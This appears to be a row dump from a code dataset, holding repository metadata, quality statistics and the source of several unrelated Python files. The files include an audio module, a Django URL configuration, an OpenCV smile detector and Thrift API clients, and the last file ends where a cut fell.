| 0.006052
| 0
| 0
| 0
| 0.003745
| 0.118367
| 1
| 0.040816
| false
| 0.004082
| 0.040816
| 0
| 0.146939
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5a924ddb3332cd660e8de578d9b220740f27184
| 3,185
|
py
|
Python
|
pykob/audio.py
|
Greg-R/PyKOB
|
fd3c7ca352f900bd14bb10dc71d567221a8af8cf
|
[
"MIT"
] | 3
|
2020-06-29T19:59:39.000Z
|
2021-02-08T19:56:32.000Z
|
pykob/audio.py
|
Greg-R/PyKOB
|
fd3c7ca352f900bd14bb10dc71d567221a8af8cf
|
[
"MIT"
] | 197
|
2020-04-30T08:08:52.000Z
|
2021-03-22T19:10:20.000Z
|
pykob/audio.py
|
MorseKOB/pykob-4
|
bf86917e4e06ce9590f414ace0eacbde08416137
|
[
"MIT"
] | 2
|
2021-04-17T01:05:24.000Z
|
2021-11-03T16:43:53.000Z
|
"""
MIT License
Copyright (c) 2020 PyKOB - MorseKOB in Python
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
"""
audio module
Provides audio for simulated sounder.
"""
import wave
from pathlib import Path
from pykob import log
try:
import pyaudio
ok = True
except:
log.log('PyAudio not installed.')
ok = False
BUFFERSIZE = 16
nFrames = [0, 0]
frames = [None, None]
nullFrames = None
iFrame = [0, 0]
sound = 0
if ok:
pa = pyaudio.PyAudio()
# Resource folder
root_folder = Path(__file__).parent
resource_folder = root_folder / "resources"
# Audio files
audio_files = ['clack48.wav', 'click48.wav']
for i in range(len(audio_files)):
fn = resource_folder / audio_files[i]
# print("Load audio file:", fn)
f = wave.open(str(fn), mode='rb')
nChannels = f.getnchannels()
sampleWidth = f.getsampwidth()
sampleFormat = pa.get_format_from_width(sampleWidth)
frameWidth = nChannels * sampleWidth
frameRate = f.getframerate()
nFrames[i] = f.getnframes()
frames[i] = f.readframes(nFrames[i])
iFrame[i] = nFrames[i]
f.close()
nullFrames = bytes(frameWidth*BUFFERSIZE)
def play(snd):
global sound
sound = snd
iFrame[sound] = 0
def callback(in_data, frame_count, time_info, status_flags):
if frame_count != BUFFERSIZE:
log.err('Unexpected frame count request from PyAudio:', frame_count)
if iFrame[sound] + frame_count < nFrames[sound]:
startByte = iFrame[sound] * frameWidth
endByte = (iFrame[sound] + frame_count) * frameWidth
outData = frames[sound][startByte:endByte]
iFrame[sound] += frame_count
return (outData, pyaudio.paContinue)
else:
return(nullFrames, pyaudio.paContinue)
if ok:
apiInfo = pa.get_default_host_api_info()
apiName = apiInfo['name']
devIdx = apiInfo['defaultOutputDevice']
devInfo = pa.get_device_info_by_index(devIdx)
devName = devInfo['name']
strm = pa.open(rate=frameRate, channels=nChannels, format=sampleFormat,
output=True, output_device_index=devIdx, frames_per_buffer=BUFFERSIZE,
stream_callback=callback)
| 32.5
| 82
| 0.706122
| 423
| 3,185
| 5.231678
| 0.477541
| 0.039765
| 0.02169
| 0.028468
| 0.025305
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006352
| 0.209105
| 3,185
| 97
| 83
| 32.835052
| 0.872172
| 0.358242
| 0
| 0.035088
| 0
| 0
| 0.063797
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035088
| false
| 0
| 0.070175
| 0
| 0.122807
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5ac9cd651f965f113812d5a35b9a777736d390b
| 3,492
|
py
|
Python
|
{{ cookiecutter.project_slug }}/{{ cookiecutter.package_name }}/strategies/resource.py
|
EMMC-ASBL/oteapi-plugin-template
|
31a772a4fb9be6eafabfa206fe6e7a23516bf188
|
[
"MIT"
] | null | null | null |
{{ cookiecutter.project_slug }}/{{ cookiecutter.package_name }}/strategies/resource.py
|
EMMC-ASBL/oteapi-plugin-template
|
31a772a4fb9be6eafabfa206fe6e7a23516bf188
|
[
"MIT"
] | 35
|
2022-01-17T10:23:01.000Z
|
2022-03-11T19:41:36.000Z
|
{{ cookiecutter.project_slug }}/{{ cookiecutter.package_name }}/strategies/resource.py
|
EMMC-ASBL/oteapi-plugin-template
|
31a772a4fb9be6eafabfa206fe6e7a23516bf188
|
[
"MIT"
] | 2
|
2022-01-20T06:45:27.000Z
|
2022-02-09T15:59:21.000Z
|
"""Demo resource strategy class."""
# pylint: disable=no-self-use,unused-argument
from typing import TYPE_CHECKING, Optional
from oteapi.models import AttrDict, DataCacheConfig, ResourceConfig, SessionUpdate
from oteapi.plugins import create_strategy
from pydantic import Field
from pydantic.dataclasses import dataclass
if TYPE_CHECKING: # pragma: no cover
from typing import Any, Dict
class DemoConfig(AttrDict):
"""Strategy-specific Configuration Data Model."""
datacache_config: Optional[DataCacheConfig] = Field(
None,
description="Configuration for the data cache.",
)
class DemoResourceConfig(ResourceConfig):
"""Demo resource strategy config."""
# Require the resource to be a REST API with JSON responses that uses the
# DemoJSONDataParseStrategy strategy.
mediaType: str = Field(
"application/jsonDEMO",
const=True,
description=ResourceConfig.__fields__["mediaType"].field_info.description,
)
accessService: str = Field(
"DEMO-access-service",
const=True,
description=ResourceConfig.__fields__["accessService"].field_info.description,
)
configuration: DemoConfig = Field(
DemoConfig(),
description="Demo resource strategy-specific configuration.",
)
class SessionUpdateDemoResource(SessionUpdate):
"""Class for returning values from Demo Resource strategy."""
output: dict = Field(
...,
description=(
"The output from downloading the response from the given `accessUrl`."
),
)
@dataclass
class DemoResourceStrategy:
"""Resource Strategy.
**Registers strategies**:
- `("accessService", "DEMO-access-service")`
"""
resource_config: DemoResourceConfig
def initialize(self, session: "Optional[Dict[str, Any]]" = None) -> SessionUpdate:
"""Initialize strategy.
This method will be called through the `/initialize` endpoint of the OTEAPI
Services.
Parameters:
session: A session-specific dictionary context.
Returns:
An update model of key/value-pairs to be stored in the
session-specific context from services.
"""
return SessionUpdate()
def get(
self, session: "Optional[Dict[str, Any]]" = None
) -> SessionUpdateDemoResource:
"""Execute the strategy.
This method will be called through the strategy-specific endpoint of the
OTEAPI Services.
Parameters:
session: A session-specific dictionary context.
Returns:
An update model of key/value-pairs to be stored in the
session-specific context from services.
"""
# Example of the plugin using a parse strategy to (fetch) and parse the data
session = session if session else {}
parse_config = self.resource_config.copy()
if not parse_config.downloadUrl:
parse_config.downloadUrl = self.resource_config.accessUrl
session.update(create_strategy("parse", parse_config).initialize(session))
session.update(create_strategy("parse", parse_config).get(session))
if "content" not in session:
raise ValueError(
f"Expected the parse strategy for {self.resource_config.mediaType!r} "
"to return a session with a 'content' key."
)
return SessionUpdateDemoResource(output=session["content"])
| 29.846154
| 86
| 0.665521
| 362
| 3,492
| 6.350829
| 0.337017
| 0.034798
| 0.034798
| 0.029578
| 0.275772
| 0.240974
| 0.240974
| 0.174859
| 0.140061
| 0.140061
| 0
| 0
| 0.248568
| 3,492
| 116
| 87
| 30.103448
| 0.876143
| 0.30756
| 0
| 0.037037
| 0
| 0
| 0.173835
| 0.015233
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037037
| false
| 0
| 0.111111
| 0
| 0.37037
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5b066bc7defe004716762bdcddd92dae0d3fd15
| 876
|
py
|
Python
|
BaseKnowledge/file/file.py
|
Kose-i/python_test
|
d7b031aa33d699aeb9fe196fe0a6d216aa006f0d
|
[
"Unlicense"
] | null | null | null |
BaseKnowledge/file/file.py
|
Kose-i/python_test
|
d7b031aa33d699aeb9fe196fe0a6d216aa006f0d
|
[
"Unlicense"
] | null | null | null |
BaseKnowledge/file/file.py
|
Kose-i/python_test
|
d7b031aa33d699aeb9fe196fe0a6d216aa006f0d
|
[
"Unlicense"
] | null | null | null |
#! /usr/bin/env python3
def func1():
f = open("test.txt", 'w')
f.write("This is test")
f.close()
def func2():
with open("test.txt", 'r') as f:
print(f.read())
import codecs
def func3():
f = codecs.open("test.txt", 'w', 'utf-8', 'ignore')
f.write("test func3")
f.close()
import os.path
def func4():
path = "tmp/tmp-1/tmp.txt"
print(os.path.split(path))
import shutil
def func5():
shutil.copyfile("test.txt", "test2.txt")
import glob
def func6():
print(glob.glob('*'))
import tempfile
def func7():
tmpfd, tmpname = tempfile.mkstemp(dir='.')
print(tmpname)
f = os.fdopen(tmpfd, 'w+b')
f.close()
if __name__=='__main__':
print("\nfunc1()")
func1()
print("\nfunc2()")
func2()
print("\nfunc3()")
func3()
print("\nfunc4()")
func4()
print("\nfunc5()")
func5()
print("\nfunc6()")
func6()
print("\nfunc7()")
func7()
| 16.528302
| 53
| 0.592466
| 125
| 876
| 4.088
| 0.456
| 0.054795
| 0.064579
| 0.046967
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035961
| 0.174658
| 876
| 52
| 54
| 16.846154
| 0.670816
| 0.025114
| 0
| 0.069767
| 0
| 0
| 0.199297
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.162791
| false
| 0
| 0.116279
| 0
| 0.27907
| 0.255814
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5b4efb9c597491e24e7c42cb5dac380b74e6e91
| 702
|
py
|
Python
|
apps/billing/tasks.py
|
banyanbbt/banyan_data
|
4ce87dc1c49920d587a472b70842fcf5b3d9a3d2
|
[
"MIT"
] | 2
|
2018-09-08T05:16:39.000Z
|
2018-09-10T02:50:31.000Z
|
apps/billing/tasks.py
|
banyanbbt/banyan_data
|
4ce87dc1c49920d587a472b70842fcf5b3d9a3d2
|
[
"MIT"
] | null | null | null |
apps/billing/tasks.py
|
banyanbbt/banyan_data
|
4ce87dc1c49920d587a472b70842fcf5b3d9a3d2
|
[
"MIT"
] | null | null | null |
import logging
from config.celery_configs import app
from lib.sms import client as sms_client
from lib.blockchain.pandora import Pandora
from apps.user.models import UserProfile
logger = logging.getLogger(__name__)
@app.task
def sync_monthly_billing():
logger.info("start sync_monthly_billing")
accounts = UserProfile.company_accounts()
for account in accounts:
Pandora.monthly_bill(account)
logger.info("end sync_monthly_billing")
@app.task
def sync_weekly_billing():
logger.info("start sync_weekly_billing")
accounts = UserProfile.company_accounts()
for account in accounts:
Pandora.weekly_bill(account)
logger.info("end sync_weekly_billing")
| 23.4
| 45
| 0.763533
| 92
| 702
| 5.586957
| 0.380435
| 0.077821
| 0.105058
| 0.054475
| 0.474708
| 0.373541
| 0.264591
| 0.264591
| 0.264591
| 0.264591
| 0
| 0
| 0.156695
| 702
| 29
| 46
| 24.206897
| 0.868243
| 0
| 0
| 0.3
| 0
| 0
| 0.140401
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.25
| 0
| 0.35
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5b824b421e3455471988b500baaf9d0bcd0357a
| 4,981
|
py
|
Python
|
website/urls.py
|
pomo-mondreganto/CTForces-old
|
86758192f800108ff109f07fe155d5a98b4a3e14
|
[
"MIT"
] | null | null | null |
website/urls.py
|
pomo-mondreganto/CTForces-old
|
86758192f800108ff109f07fe155d5a98b4a3e14
|
[
"MIT"
] | 6
|
2021-10-01T14:18:34.000Z
|
2021-10-01T14:19:17.000Z
|
website/urls.py
|
pomo-mondreganto/CTForces-old
|
86758192f800108ff109f07fe155d5a98b4a3e14
|
[
"MIT"
] | null | null | null |
from django.conf import settings
from django.urls import path, re_path
from django.views.static import serve
from .views import *
urlpatterns = [
re_path('^$', MainView.as_view(), name='main_view'),
path('page/<int:page>/', MainView.as_view(), name='main_view_with_page'),
re_path('^signup/$', UserRegistrationView.as_view(), name='signup'),
re_path('^signin/$', UserLoginView.as_view(), name='signin'),
re_path('^logout/$', logout_user, name='logout'),
path('user/<str:username>/', UserInformationView.as_view(), name='user_info'),
re_path('^settings/general/$', SettingsGeneralView.as_view(), name='settings_general_view'),
re_path('^settings/social/$', SettingsSocialView.as_view(), name='settings_social_view'),
re_path('^friends/$', FriendsView.as_view(), name='friends_view'),
path('friends/page/<int:page>/', FriendsView.as_view(), name='friends_view_with_page'),
re_path('^search_users/$', search_users, name='user_search'),
path('user/<str:username>/blog/', UserBlogView.as_view(), name='user_blog_view'),
path('user/<str:username>/blog/page/<int:page>/', UserBlogView.as_view(), name='user_blog_view_with_page'),
path('user/<str:username>/tasks/', UserTasksView.as_view(), name='user_tasks_view'),
path('user/<str:username>/tasks/page/<int:page>/', UserTasksView.as_view(), name='user_tasks_view_with_page'),
path('user/<str:username>/contests/', UserContestListView.as_view(), name='user_contests_view'),
path('user/<str:username>/contests/page/<int:page>/', UserContestListView.as_view(),
name='user_contests_view_with_page'),
path('user/<str:username>/solved_tasks/', UserSolvedTasksView.as_view(),
name='user_solved_tasks_view'),
path('user/<str:username>/solved_tasks/page/<int:page>/', UserSolvedTasksView.as_view(),
name='user_solved_tasks_view_with_page'),
path('top_users/', UserTopView.as_view(), name='users_top_view'),
path('top_users/page/<int:page>/', UserTopView.as_view(), name='users_top_view_with_page'),
path('top_rating_users/', UserRatingTopView.as_view(), name='users_rating_top_view'),
path('top_rating_users/page/<int:page>/', UserRatingTopView.as_view(), name='users_rating_top_view_with_page'),
path('top_rating_users_by_group/', UserByGroupRatingTopView.as_view(), name='users_by_group_rating_top_view'),
path('top_rating_users_by_group/page/<int:page>/', UserByGroupRatingTopView.as_view(),
name='users_by_group_rating_top_view_with_page'),
re_path('^add_post/$', PostCreationView.as_view(), name='post_creation_view'),
path('post/<int:post_id>/', PostView.as_view(), name='post_view'),
re_path('^leave_comment/$', leave_comment, name='leave_comment'),
re_path('^media/(?P<path>.*)$', serve, {
'document_root': settings.MEDIA_ROOT,
}),
path('task/<int:task_id>/', TaskView.as_view(), name='task_view'),
path('task/<int:task_id>/edit/', TaskEditView.as_view(), name='task_edit_view'),
path('task/<int:task_id>/submit/', submit_task, name='task_submit'),
path('task/<int:task_id>/solved/', TaskSolvedView.as_view(), name='task_solved_view'),
path('task/<int:task_id>/solved/page/<int:page>/', TaskSolvedView.as_view(), name='task_solved_view_with_page'),
re_path('^create_task/$', TaskCreationView.as_view(), name='task_creation_view'),
re_path('^tasks/$', TasksArchiveView.as_view(), name='task_archive_view'),
path('tasks/page/<int:page>/', TasksArchiveView.as_view(), name='task_archive_view_with_page'),
re_path('^confirm_email/$', account_confirmation, name='confirm_account'),
re_path('^resend_email/$', EmailResendView.as_view(), name='resend_email_view'),
re_path('^password_reset_email/$', PasswordResetEmailView.as_view(), name='password_reset_email'),
re_path('^reset_password/$', PasswordResetPasswordView.as_view(), name='password_reset_password'),
re_path('^search_tags/$', search_tags, name='search_tags'),
re_path('^get_task/$', get_task, name='get_task_by_id'),
re_path('^create_contest/$', ContestCreationView.as_view(), name='create_contest'),
path('contests/', ContestsMainListView.as_view(), name='contests_main_list_view'),
path('contests/page/<int:page>/', ContestsMainListView.as_view(), name='contests_main_list_view_with_page'),
path('contest/<int:contest_id>/', ContestMainView.as_view(), name='contest_view'),
path('contest/<int:contest_id>/register/', register_for_contest, name='register_for_contest'),
path('contest/<int:contest_id>/scoreboard/', ContestScoreboardView.as_view(), name='contest_scoreboard_view'),
path('contest/<int:contest_id>/task/<int:task_id>/', ContestTaskView.as_view(), name='contest_task_view'),
path('contest/<int:contest_id>/task/<int:task_id>/submit/', submit_contest_flag, name='contest_task_submit'),
re_path('^test', test_view, name='test_view'),
re_path('^debug', debug_view, name='debug_view'),
]
| 54.736264
| 116
| 0.718932
| 666
| 4,981
| 5.018018
| 0.15015
| 0.102932
| 0.122681
| 0.051167
| 0.514961
| 0.429683
| 0.331239
| 0.162478
| 0.059246
| 0.059246
| 0
| 0
| 0.093957
| 4,981
| 90
| 117
| 55.344444
| 0.740527
| 0
| 0
| 0
| 0
| 0
| 0.429633
| 0.259787
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.030769
| 0.061538
| 0
| 0.061538
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5b8284d0679076f983319f40b4e3ceca65a28c5
| 1,372
|
py
|
Python
|
part2.py
|
Tiziana-I/project-covid-mask-classifier
|
e1619172656f8de92e8faae5dcb7437686f7ca5e
|
[
"MIT"
] | null | null | null |
part2.py
|
Tiziana-I/project-covid-mask-classifier
|
e1619172656f8de92e8faae5dcb7437686f7ca5e
|
[
"MIT"
] | null | null | null |
part2.py
|
Tiziana-I/project-covid-mask-classifier
|
e1619172656f8de92e8faae5dcb7437686f7ca5e
|
[
"MIT"
] | null | null | null |
import numpy as np
import cv2
import os
cap = cv2.VideoCapture(0)
#model=cv2.CascadeClassifier(os.path.join("haar-cascade-files","haarcascade_frontalface_default.xml"))
smile=cv2.CascadeClassifier(os.path.join("haar-cascade-files","haarcascade_smile.xml"))
#eye=cv2.CascadeClassifier(os.path.join("haar-cascade-files","haarcascade_eye.xml"))
while(True):
# Capture frame-by-frame
ret, frame = cap.read()
# Face detector
#cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),2)
#roi = frame[y:y+h,x:x+w]
#faces = model.detectMultiScale(frame,scaleFactor=1.5,minNeighbors=3,flags=cv2.CASCADE_DO_ROUGH_SEARCH | cv2.CASCADE_SCALE_IMAGE)
faces = smile.detectMultiScale(frame,scaleFactor=1.5,minNeighbors=3,flags=cv2.CASCADE_DO_ROUGH_SEARCH | cv2.CASCADE_SCALE_IMAGE)
#faces = eye.detectMultiScale(frame,scaleFactor=1.5,minNeighbors=3,flags=cv2.CASCADE_DO_ROUGH_SEARCH | cv2.CASCADE_SCALE_IMAGE)
print(faces)
for x,y,w,h in faces:
print(x,y,w,h)
cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),2) # blue BGR
frame = cv2.putText(frame,"Ciao", (50, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 0, 0) , 2, cv2.LINE_AA)
# Display the resulting frame
cv2.imshow('frame', frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# When everything done, release the capture
cap.release()
cv2.destroyAllWindows()
| 38.111111
| 133
| 0.707726
| 213
| 1,372
| 4.455399
| 0.375587
| 0.063224
| 0.069547
| 0.082192
| 0.55216
| 0.55216
| 0.55216
| 0.55216
| 0.55216
| 0.371971
| 0
| 0.045416
| 0.133382
| 1,372
| 36
| 134
| 38.111111
| 0.752733
| 0.456268
| 0
| 0
| 0
| 0
| 0.066576
| 0.028533
| 0
| 0
| 0.005435
| 0
| 0
| 1
| 0
| false
| 0
| 0.166667
| 0
| 0.166667
| 0.111111
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5b8565cb66fcfd69f346054d3bf2453f6824c71
| 1,371
|
py
|
Python
|
docs/commands.py
|
immersionroom/vee
|
2c6f781dc96e9028f2446777b906ca37dc2f4299
|
[
"BSD-3-Clause"
] | 6
|
2017-11-05T02:44:10.000Z
|
2021-07-14T19:10:56.000Z
|
docs/commands.py
|
immersionroom/vee
|
2c6f781dc96e9028f2446777b906ca37dc2f4299
|
[
"BSD-3-Clause"
] | null | null | null |
docs/commands.py
|
immersionroom/vee
|
2c6f781dc96e9028f2446777b906ca37dc2f4299
|
[
"BSD-3-Clause"
] | 1
|
2017-01-31T23:10:09.000Z
|
2017-01-31T23:10:09.000Z
|
import os
import sys
from argparse import _SubParsersAction
sys.path.append(os.path.abspath(os.path.join(__file__, '..', '..')))
from vee.commands.main import get_parser
def get_sub_action(parser):
for action in parser._actions:
if isinstance(action, _SubParsersAction):
return action
parser = get_parser()
usage = parser.format_usage().replace('usage:', '')
print('''
top-level
---------
.. _cli_vee:
``vee``
~~~~~~~
::
''')
for line in parser.format_help().splitlines():
print(' ' + line)
subaction = get_sub_action(parser)
for group_name, funcs in parser._func_groups:
did_header = False
visible = set(ca.dest for ca in subaction._choices_actions)
for name, func in funcs:
if not name in visible:
continue
if not did_header:
print('.. _cli_%s:' % group_name.replace(' ', '_'))
print()
print(group_name)
print('-' * len(group_name))
print()
did_header = True
subparser = subaction._name_parser_map[name]
print('.. _cli_vee_%s:' % name)
print()
print('``vee %s``' % name)
print('~' * (8 + len(name)))
print()
print('::')
print()
for line in subparser.format_help().splitlines():
print(' ' + line)
print()
| 18.527027
| 68
| 0.56674
| 157
| 1,371
| 4.707006
| 0.363057
| 0.073072
| 0.032476
| 0.048714
| 0.135318
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00102
| 0.285193
| 1,371
| 73
| 69
| 18.780822
| 0.753061
| 0
| 0
| 0.173913
| 0
| 0
| 0.086194
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021739
| false
| 0
| 0.086957
| 0
| 0.130435
| 0.347826
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5bc2b0b89e7e05fdfc86ac8ee4661e2d1a71f8f
| 13,303
|
py
|
Python
|
thrift/clients.py
|
fabiobatalha/processing
|
f3ad99e161de2befc7908168bfd7843f988c379d
|
[
"BSD-2-Clause"
] | null | null | null |
thrift/clients.py
|
fabiobatalha/processing
|
f3ad99e161de2befc7908168bfd7843f988c379d
|
[
"BSD-2-Clause"
] | null | null | null |
thrift/clients.py
|
fabiobatalha/processing
|
f3ad99e161de2befc7908168bfd7843f988c379d
|
[
"BSD-2-Clause"
] | null | null | null |
# coding: utf-8
import os
import thriftpy
import json
import logging
from thriftpy.rpc import make_client
from xylose.scielodocument import Article, Journal
LIMIT = 1000
logger = logging.getLogger(__name__)
ratchet_thrift = thriftpy.load(
os.path.join(os.path.dirname(__file__))+'/ratchet.thrift')
articlemeta_thrift = thriftpy.load(
os.path.join(os.path.dirname(__file__))+'/articlemeta.thrift')
citedby_thrift = thriftpy.load(
os.path.join(os.path.dirname(__file__))+'/citedby.thrift')
accessstats_thrift = thriftpy.load(
os.path.join(os.path.dirname(__file__))+'/access_stats.thrift')
publication_stats_thrift = thriftpy.load(
os.path.join(os.path.dirname(__file__))+'/publication_stats.thrift')
class ServerError(Exception):
def __init__(self, message=None):
self.message = message or 'thirftclient: ServerError'
def __str__(self):
return repr(self.message)
class AccessStats(object):
def __init__(self, address, port):
"""
Cliente thrift para o Access Stats.
"""
self._address = address
self._port = port
@property
def client(self):
client = make_client(
accessstats_thrift.AccessStats,
self._address,
self._port
)
return client
def _compute_access_lifetime(self, query_result):
data = []
for publication_year in query_result['aggregations']['publication_year']['buckets']:
for access_year in publication_year['access_year']['buckets']:
data.append([
publication_year['key'],
access_year['key'],
int(access_year['access_html']['value']),
int(access_year['access_abstract']['value']),
int(access_year['access_pdf']['value']),
int(access_year['access_epdf']['value']),
int(access_year['access_total']['value'])
])
return sorted(data)
def access_lifetime(self, issn, collection, raw=False):
body = {
"query": {
"bool": {
"must": [{
"match": {
"collection": collection
}
},
{
"match": {
"issn": issn
}
}
]
}
},
"size": 0,
"aggs": {
"publication_year": {
"terms": {
"field": "publication_year",
"size": 0,
"order": {
"access_total": "desc"
}
},
"aggs": {
"access_total": {
"sum": {
"field": "access_total"
}
},
"access_year": {
"terms": {
"field": "access_year",
"size": 0,
"order": {
"access_total": "desc"
}
},
"aggs": {
"access_total": {
"sum": {
"field": "access_total"
}
},
"access_abstract": {
"sum": {
"field": "access_abstract"
}
},
"access_epdf": {
"sum": {
"field": "access_epdf"
}
},
"access_html": {
"sum": {
"field": "access_html"
}
},
"access_pdf": {
"sum": {
"field": "access_pdf"
}
}
}
}
}
}
}
}
query_parameters = [
accessstats_thrift.kwargs('size', '0')
]
query_result = json.loads(self.client.search(json.dumps(body), query_parameters))
computed = self._compute_access_lifetime(query_result)
return query_result if raw else computed
class PublicationStats(object):
def __init__(self, address, port):
"""
Cliente thrift para o PublicationStats.
"""
self._address = address
self._port = port
@property
def client(self):
client = make_client(
publication_stats_thrift.PublicationStats,
self._address,
self._port
)
return client
def _compute_first_included_document_by_journal(self, query_result):
if len(query_result.get('hits', {'hits': []}).get('hits', [])) == 0:
return None
return query_result['hits']['hits'][0].get('_source', None)
def first_included_document_by_journal(self, issn, collection):
body = {
"query": {
"filtered": {
"query": {
"bool": {
"must": [
{
"match": {
"collection": collection
}
},
{
"match": {
"issn": issn
}
}
]
}
}
}
},
"sort": [
{
"publication_date": {
"order": "asc"
}
}
]
}
query_parameters = [
publication_stats_thrift.kwargs('size', '1')
]
query_result = json.loads(self.client.search('article', json.dumps(body), query_parameters))
return self._compute_first_included_document_by_journal(query_result)
def _compute_last_included_document_by_journal(self, query_result):
if len(query_result.get('hits', {'hits': []}).get('hits', [])) == 0:
return None
return query_result['hits']['hits'][0].get('_source', None)
def last_included_document_by_journal(self, issn, collection, metaonly=False):
body = {
"query": {
"filtered": {
"query": {
"bool": {
"must": [
{
"match": {
"collection": collection
}
},
{
"match": {
"issn": issn
}
}
]
}
},
"filter": {
"exists": {
"field": "publication_date"
}
}
}
},
"sort": [
{
"publication_date": {
"order": "desc"
}
}
]
}
query_parameters = [
publication_stats_thrift.kwargs('size', '1')
]
query_result = json.loads(self.client.search('article', json.dumps(body), query_parameters))
return self._compute_last_included_document_by_journal(query_result)
class Citedby(object):
def __init__(self, address, port):
"""
Cliente thrift para o Citedby.
"""
self._address = address
self._port = port
@property
def client(self):
client = make_client(
citedby_thrift.Citedby,
self._address,
self._port
)
return client
def citedby_pid(self, code, metaonly=False):
data = self.client.citedby_pid(code, metaonly)
return data
class Ratchet(object):
def __init__(self, address, port):
"""
Cliente thrift para o Ratchet.
"""
self._address = address
self._port = port
@property
def client(self):
client = make_client(
ratchet_thrift.RatchetStats,
self._address,
self._port
)
return client
def document(self, code):
data = self.client.general(code=code)
return data
class ArticleMeta(object):
def __init__(self, address, port):
"""
Cliente thrift para o Articlemeta.
"""
self._address = address
self._port = port
@property
def client(self):
client = make_client(
articlemeta_thrift.ArticleMeta,
self._address,
self._port
)
return client
def journals(self, collection=None, issn=None):
offset = 0
while True:
identifiers = self.client.get_journal_identifiers(collection=collection, issn=issn, limit=LIMIT, offset=offset)
if len(identifiers) == 0:
raise StopIteration
for identifier in identifiers:
journal = self.client.get_journal(
code=identifier.code[0], collection=identifier.collection)
jjournal = json.loads(journal)
xjournal = Journal(jjournal)
logger.info('Journal loaded: %s_%s' % ( identifier.collection, identifier.code))
yield xjournal
offset += 1000
def exists_article(self, code, collection):
try:
return self.client.exists_article(
code,
collection
)
except:
msg = 'Error checking if document exists: %s_%s' % (collection, code)
raise ServerError(msg)
def set_doaj_id(self, code, collection, doaj_id):
try:
article = self.client.set_doaj_id(
code,
collection,
doaj_id
)
except:
msg = 'Error senting doaj id for document: %s_%s' % (collection, code)
raise ServerError(msg)
def document(self, code, collection, replace_journal_metadata=True, fmt='xylose'):
try:
article = self.client.get_article(
code=code,
collection=collection,
replace_journal_metadata=True,
fmt=fmt
)
except:
msg = 'Error retrieving document: %s_%s' % (collection, code)
raise ServerError(msg)
jarticle = None
try:
jarticle = json.loads(article)
except:
